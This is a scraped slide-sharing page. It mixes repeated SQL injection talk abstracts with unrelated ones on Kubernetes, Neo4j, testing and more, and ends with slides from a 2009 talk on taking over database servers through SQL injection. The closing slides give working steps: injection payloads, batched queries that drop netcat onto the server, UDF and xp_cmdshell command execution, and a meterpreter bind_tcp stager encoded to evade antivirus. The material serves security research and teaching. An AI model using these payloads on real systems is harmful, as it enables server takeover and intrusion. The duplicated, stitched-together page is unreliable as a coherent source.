Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
These slides have been presented at OWASP AppSec Europe 2009 conference in Krakow on May 13, 2009.
Full version presented at Black Hat Europe 2009 Conference, slides available here, http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
Expanding the control over the operating system from the databaseBernardo Damele A. G.
Using a database, either via a SQL injection or via direct connection, as a stepping stone to control the underlying operating system can be achieved.
There is much to say on operating system control by owning a database server: Windows registry access, anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protections bypass and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
Advanced SQL injection to operating system full control (short version)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
These slides have been presented at EUSecWest conference in London on May 28, 2009.
Full version presented at Black Hat Europe 2009 Conference, slides available here, http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
The presentation highlights techniques to exploit a MySQL, PostgreSQL or Microsoft SQL Server database server in real world: how to abuse databases features to takeover the server as a whole, how to break out of the mere database process, get control of the operating system and escalate process' privileges to SYSTEM and how to make the life of the forensics analyst harder in a post-exploitation investigation.
These slides have been presented at AthCon 2010 conference in Athens on June 3, 2010.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at Black Hat Euroe conference in Amsterdam on April 16, 2009.
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
Expanding the control over the operating system from the databaseBernardo Damele A. G.
Using a database, either via a SQL injection or via direct connection, as a stepping stone to control the underlying operating system can be achieved.
There is much to say on operating system control by owning a database server: Windows registry access, anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protections bypass and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
Advanced SQL injection to operating system full control (short version)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
These slides have been presented at EUSecWest conference in London on May 28, 2009.
Full version presented at Black Hat Europe 2009 Conference, slides available here, http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
The presentation highlights techniques to exploit a MySQL, PostgreSQL or Microsoft SQL Server database server in real world: how to abuse databases features to takeover the server as a whole, how to break out of the mere database process, get control of the operating system and escalate process' privileges to SYSTEM and how to make the life of the forensics analyst harder in a post-exploitation investigation.
These slides have been presented at AthCon 2010 conference in Athens on June 3, 2010.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at Black Hat Euroe conference in Amsterdam on April 16, 2009.
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
These are the slides from a talk "sqlmap - security development in Python" held at EuroPython 2011 conference (Italy / Florence 19th–26th June 2011) by Miroslav Stampar
These are the slides from a talk "DNS exfiltration using sqlmap" held at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) by Miroslav Stampar.
SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
A pragmatic approach to different SQL Injection techniques such as Stacked statements, Tautology based, Union based, Error based, Second Order and Blind SQL Injection coherently explaining the path behind these attacks including tips and tricks to make them more likely to work in real life.
Also I will show you ways to avoid weak defenses as black listing and quote filtering as well as how privilege escalation may take place from this sort of vulnerabilities.
There will be a live demonstration where you can catch on some handy tools and actually see blind sql injection working efficiently with the latest techniques showing you why this type of SQL injection shouldn't be taken any less seriously than any other.
Finally, a word on countermeasures and real solutions to prevent these attacks, what you should do and what you should not.
http://videos.sapo.pt/ZvwITnTBMzD8HYvEZrov (video)
A basic tutorial on using sqlmap on Kali Linux for sql injection.
The main focus being on comparison between manual and automated sql injection.
Some important parameters discussed and steps to be taken to discover vulnerabilities
By rushikesh kulkarni, president of Anonymous Club of BMSCE
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from
database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
These are the slides from a talk "It all starts with the ' (SQL injection from attacker's point of view)" held at FSec 2011 conference (Croatia / Varazdin 22nd September 2011) by Miroslav Stampar
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the Front Range OWASP Conference in Denver on March 5, 2009.
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASInvenire Aude
How to access the database and implement a service over HTTP/REST or IBM WebSphere MQ (XML or JSON).
Quick introduction to the SQL extension for IAS Data Processors.
http://www.invenireaude.com/content/blogs/index.html
Show the reader the potential damage that a SQL injection vulnerability can make. Show evading techniques to some filters. Show some common mistakes that the programmers make when protecting their sites. Show the best practices to protect your code.
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
Learn what is SQL injection, how to use prepared statements, how to escape and write secure stored procedures. Many PHP projects are covered - PDO, Propel, Doctrine, Zend Framework and MDB2. Multiple gotchas included.
Data Tracking: On the Hunt for Information about Your DatabaseMichael Rosenblum
Behind the scenes, Oracle databases hide a myriad of processes to ensure that your data can be safely stored and retrieved. These processes also leave “tracks” (or they COULD leave tracks if you set them up properly). These tracks, together with application-specific data, create a complete representation of the system’s day-to-day activity. Too often this representation is lost at the DBA/Developer borderline, mostly because one side is not aware of the needs of the other. This presentation strives to bridge this gap. It focuses on key sources of database information and techniques that are useful for both DBAs and developers:
- Data Dictionary
- Oracle Logging
- Oracle Tracing
- Advanced code instrumentation
These are the slides from a talk "sqlmap - security development in Python" held at EuroPython 2011 conference (Italy / Florence 19th–26th June 2011) by Miroslav Stampar
These are the slides from a talk "DNS exfiltration using sqlmap" held at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) by Miroslav Stampar.
SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
A pragmatic approach to different SQL Injection techniques such as Stacked statements, Tautology based, Union based, Error based, Second Order and Blind SQL Injection coherently explaining the path behind these attacks including tips and tricks to make them more likely to work in real life.
Also I will show you ways to avoid weak defenses as black listing and quote filtering as well as how privilege escalation may take place from this sort of vulnerabilities.
There will be a live demonstration where you can catch on some handy tools and actually see blind sql injection working efficiently with the latest techniques showing you why this type of SQL injection shouldn't be taken any less seriously than any other.
Finally, a word on countermeasures and real solutions to prevent these attacks, what you should do and what you should not.
http://videos.sapo.pt/ZvwITnTBMzD8HYvEZrov (video)
A basic tutorial on using sqlmap on Kali Linux for sql injection.
The main focus being on comparison between manual and automated sql injection.
Some important parameters discussed and steps to be taken to discover vulnerabilities
By rushikesh kulkarni, president of Anonymous Club of BMSCE
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from
database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
These are the slides from a talk "It all starts with the ' (SQL injection from attacker's point of view)" held at FSec 2011 conference (Croatia / Varazdin 22nd September 2011) by Miroslav Stampar
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the Front Range OWASP Conference in Denver on March 5, 2009.
Enable Database Service over HTTP or IBM WebSphere MQ in 15_minutes with IASInvenire Aude
How to access the database and implement a service over HTTP/REST or IBM WebSphere MQ (XML or JSON).
Quick introduction to the SQL extension for IAS Data Processors.
http://www.invenireaude.com/content/blogs/index.html
Show the reader the potential damage that a SQL injection vulnerability can make. Show evading techniques to some filters. Show some common mistakes that the programmers make when protecting their sites. Show the best practices to protect your code.
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
Learn what is SQL injection, how to use prepared statements, how to escape and write secure stored procedures. Many PHP projects are covered - PDO, Propel, Doctrine, Zend Framework and MDB2. Multiple gotchas included.
Data Tracking: On the Hunt for Information about Your DatabaseMichael Rosenblum
Behind the scenes, Oracle databases hide a myriad of processes to ensure that your data can be safely stored and retrieved. These processes also leave “tracks” (or they COULD leave tracks if you set them up properly). These tracks, together with application-specific data, create a complete representation of the system’s day-to-day activity. Too often this representation is lost at the DBA/Developer borderline, mostly because one side is not aware of the needs of the other. This presentation strives to bridge this gap. It focuses on key sources of database information and techniques that are useful for both DBAs and developers:
- Data Dictionary
- Oracle Logging
- Oracle Tracing
- Advanced code instrumentation
How SQL Server was ported to Linux? The presentation goes through some of the concepts: SQLOS, Drawbridge and Containers. It shows the role of SQLPAL as a platform abstraction layer.
BKK16-409 VOSY Switch Port to ARMv8 Platforms and ODP IntegrationLinaro
Virtual Open Systems has developed VOSYSwitch, a high-performance user space networking virtual switch solution enabling NFV, based on the open source packet processing framework SnabbSwitch. In this talk, the experience of porting VOSYSwitch from x86 to ARMv8 will be shared, along with the integration of ODP as a driver layer for the available hardware resources. In addition to this presentation, a live demonstration will showcase chained VNFs connected through VOSYSwitch, where an OpenFastPath web server is implemented behind an ODP enabled packet filtering firewall. The targeted platforms are Freescale (NXP) LS2085A and Cavium's ThunderX.
Implementing code-based load tests in JavaScript with the k6 performance testing tool.
Svetlin Nakov @ QA Challenge Accepted 2021
Load and performance testing aims to determine whether software meets speed, scalability and stability requirements under expected workloads. Old school performance testing tools like Apache JMeter are complex and heavy and are not well aligned with the modern QA automation and continuous integration trends.
In this talk Svetlin presents and demonstrates the "k6 framework" - a modern open-source load testing tool, which describes the load tests as JavaScript code. The k6 tool is very powerful, high-performance and developer-friendly. It allows load testing of Web apps and APIs, accessed through the HTTP protocol.
Svetlin also demonstrates how to install and use k6, how to run its test recorder, how to edit the recorded scripts at the k6 cloud and how to write k6 scripts in JavaScript (execute HTTP requests, write checks, define thresholds), and execute the scripts with certain number of virtual users for certain duration.
Anton Moldovan "Building an efficient replication system for thousands of ter...Fwdays
For one of our projects, we needed to improve the current content delivery system for terminals. In this talk, I will share our experience in building an efficient data replication system for thousands of terminals. We will touch on architecture decisions and tradeoffs, technologies that we used, and a bit of load testing.
Spoiler: We didn't use Kafka.
You're Off the Hook: Blinding Security SoftwareCylance
User-mode hooking is dead. It’s also considered harmful due to interference with OS-level exploit mitigations like Control Flow Guard (CFG). At BlackHat US 2016, the “Captain Hook” talk revealed there were multiple serious security issues in AV hooking — we will put the final nail in the coffin by showing how trivial it is to bypass user-mode hooks. We will demonstrate a universal user-mode unhooking approach that can be included in any binary to blind security software from monitoring code execution and perform heuristic analysis. The tool and source code will be released on GitHub after the talk.
Alex Matrosov | Principal Research Scientist
Jeff Tang | Senior Security Researcher
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
GridMate - End to end testing is a critical piece to ensure quality and avoid...ThomasParaiso2
End to end testing is a critical piece to ensure quality and avoid regressions. In this session, we share our journey building an E2E testing pipeline for GridMate components (LWC and Aura) using Cypress, JSForce, FakerJS…
Communications Mining Series - Zero to Hero - Session 1DianaGray10
This session provides introduction to UiPath Communication Mining, importance and platform overview. You will acquire a good understand of the phases in Communication Mining as we go over the platform with you. Topics covered:
• Communication Mining Overview
• Why is it important?
• How can it help today’s business and the benefits
• Phases in Communication Mining
• Demo on Platform overview
• Q/A
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
2. SQL injection definition
SQL injection attacks are a type of injection
attack, in which SQL commands are injected
into data-plane input in order to affect the
execution of predefined SQL statements
It is a common threat in web applications
that lack of proper sanitization on user-
supplied input used in SQL queries
It does not affect only web applications!
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 2
3. SQL injection techniques
Boolean based blind SQL injection:
par=1 AND ORD(MID((SQL query),
Nth char, 1)) > Bisection num--
UNION query (inband) SQL injection:
par=1 UNION ALL SELECT query--
Batched queries SQL injection:
par=1; SQL query;--
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 3
4. How far can an attacker go by
exploiting a SQL injection?
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 4
5. Scope of the analysis
Three database software:
MySQL on Windows
PostgreSQL on Windows and Linux
Microsoft SQL Server on Windows
Three web application languages:
ASP on Microsoft IIS, Windows
ASP.NET on Microsoft IIS, Windows
PHP on Apache and Microsoft IIS
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 5
6. Batched queries
In SQL, batched queries are multiple SQL
statements, separated by a semicolon, and
passed to the database
Example:
SELECT col FROM table1 WHERE
id=1; DROP table2;
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 6
7. Batched queries support
ASP ASP.NET PHP
MySQL No Yes No
PostgreSQL Yes Yes Yes
Microsoft SQL Server Yes Yes Yes
Programming languages and their DBMS connectors default
support for batched queries
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 7
8. File system write access
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 8
9. File write access on MySQL
On the attacker box:
Encode the local file content to its
corresponding hexadecimal string
Split the hexadecimal encoded string into
chunks long 1024 characters each
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 9
10. File write access on MySQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data longblob);
INSERT INTO footable(data) VALUES
(0x4d5a90…610000);
UPDATE footable SET
data=CONCAT(data, 0xaa270000…000000);
[…];
SELECT data FROM footable INTO DUMPFILE
'C:/WINDOWS/Temp/nc.exe';
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 10
11. File write access on PostgreSQL
On the attacker box:
Encode the local file content to its
corresponding base64 string
Split the base64 encoded string into chunks
long 1024 characters each
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 11
12. File write access on PostgreSQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data text);
INSERT INTO footable(data) VALUES ('TVqQ…');
UPDATE footable SET data=data||'U8pp…vgDw';
[…]
SELECT lo_create(47);
UPDATE pg_largeobject SET data=(DECODE((SELECT
data FROM footable), 'base64')) WHERE loid=47;
SELECT lo_export(47, 'C:/WINDOWS/Temp/nc.exe');
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 12
13. File write access on MS SQL Server
Microsoft SQL Server can execute
commands: xp_cmdshell()
EXEC xp_cmdshell('echo … >> filepath')
Session user must have CONTROL SERVER
privilege
On the attacker box:
Split the file in chunks of 64Kb
Convert each chunk to its plain text debug
script format
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 13
14. File write access on MS SQL Server
Example of nc.exe:
00000000 4D 5A 90 00 03 00 00 00
00000008 04 00 00 00 FF FF 00 00
[…]
As a plain text debug script:
n qqlbc // Create a temporary file
rcx // Write the file size in
f000 // the CX registry
f 0100 f000 00 // Fill the segment with 0x00
e 100 4d 5a 90 00 03 […] // Write in memory all values
e 114 00 00 00 00 40 […]
[…]
w // Write the file to disk
q // Quit debug.exe
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 14
15. File write access on MS SQL Server
Via batched queries SQL injection technique:
For each debug script:
EXEC master..xp_cmdshell '
echo n qqlbc >> C:WINDOWSTempzdfiq.scr &
echo rcx >> C:WINDOWSTempzdfiq.scr &
echo f000 >> C:WINDOWSTempzdfiq.scr &
echo f 0100 f000 00 >>
C:WINDOWSTempzdfiq.scr &
[…]'
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 15
16. File write access on MS SQL Server
EXEC master..xp_cmdshell '
cd C:WINDOWSTemp &
debug < C:WINDOWSTempzdfiq.scr &
del /F C:WINDOWSTempzdfiq.scr &
copy /B /Y netcat+qqlbc netcat'
EXEC master..xp_cmdshell '
cd C:WINDOWSTemp &
move /Y netcat C:/WINDOWS/Temp/nc.exe'
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 16
18. User-Defined Function
In SQL, a user-defined function is a
custom function that can be evaluated in SQL
statements
UDF can be created from shared libraries
that are compiled binary files
Dynamic-link library on Windows
Shared object on Linux
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 18
19. UDF injection
On the attacker box:
Compile a shared library defining two UDF:
sys_eval(cmd): executes cmd, returns stdout
sys_exec(cmd): executes cmd, returns status
The shared library can also be packed to speed
up the upload via SQL injection:
Windows: UPX for the dynamic-link library
Linux: strip for the shared object
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 19
20. UDF injection
Via batched queries SQL injection technique:
Upload the shared library to the DBMS file
system
Create the two UDF from the shared library
Call either of the UDF to execute commands
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 20
21. UDF injection on MySQL
UDF Repository for MySQL
lib_mysqludf_sys shared library:
Approximately 6Kb packed
Added sys_eval() to return command
standard output
Compliant with MySQL 5.0+
Works on all versions of MySQL from 4.1.0
Compatible with both Windows or Linux
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 21
22. UDF injection on MySQL
Via batched queries SQL injection technique:
Fingerprint MySQL version
Upload the shared library to a file system path
where the MySQL looks for them
CREATE FUNCTION sys_exec RETURNS int
SONAME 'libudffmwgj.dll';
CREATE FUNCTION sys_eval RETURNS string
SONAME 'libudffmwgj.dll';
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 22
23. UDF injection on PostgreSQL
Ported MySQL shared library to PostgreSQL
lib_postgresqludf_sys shared library:
Approximately 6Kb packed
C-Language Functions: sys_eval() and
sys_exec()
Compliant with PostgreSQL 8.2+ magic block
Works on all versions of PostgreSQL from 8.0
Compatible with both Windows or Linux
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 23
24. UDF injection on PostgreSQL
Via batched queries SQL injection technique:
Fingerprint PostgreSQL version
Upload the shared library to any file system path
where PostgreSQL has rw access
CREATE OR REPLACE FUNCTION sys_exec(text)
RETURNS int4 AS 'libudflenpx.dll',
'sys_exec' LANGUAGE C […];
CREATE OR REPLACE FUNCTION sys_eval(text)
RETURNS text AS 'libudflenpx.dll',
'sys_eval' LANGUAGE C […];
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 24
25. Command execution on MS SQL Server
xp_cmdshell() stored procedure:
Session user must have sysadmin role or be
specified as a proxy account
Enabled by default on MS SQL Server 2000 or
re-enabled via sp_addextendedproc
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 25
26. Command execution on MS SQL Server
Disabled by default on MS SQL Server 2005
and 2008, it can be:
Re-enabled via sp_configure
Created from scratch using shell object
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 26
28. OOB connection definition
Contrary to in-band connections (HTTP), it uses
an alternative channel to return data
This concept can be extended to establish a full-
duplex connection between the attacker
host and the database server
Over this channel the attacker can have a command
prompt or a graphical access (VNC) to the DBMS
server
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 28
29. A good friend: Metasploit
Metasploit is a powerful open source
exploitation framework
Post-exploitation in a SQL injection scenario
SQL injection as a stepping stone for OOB
channel using Metasploit can be achieved
Requires file system write access and
command execution via in-band connection –
already achieved
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 29
30. OOB via payload stager
On the attacker box:
Forge a stand-alone payload stager with
msfpayload
Encode it with msfencode to bypass AV
Pack it with UPX to speed up the upload via
SQL injection if the target OS is Windows
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 30
31. OOB via payload stager
Example of payload stager creation and encode:
$ msfpayload windows/meterpreter/bind_tcp
EXITFUNC=process LPORT=31486 R | msfencode –e
x86/shikata_ga_nai -t exe -o stagerbvdcp.exe
Payload stager compression:
$ upx -9 –qq stagerbvdcp.exe
The payload stager size is 9728 bytes, as a
compressed executable its size is 2560 bytes
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 31
32. OOB via payload stager
On the attacker box:
Run msfcli with multi/handler exploit
Via batched queries SQL injection technique:
Upload the stand-alone payload stager to the file
system temporary folder of the DBMS
Execute it via sys_exec() or xp_cmdshell()
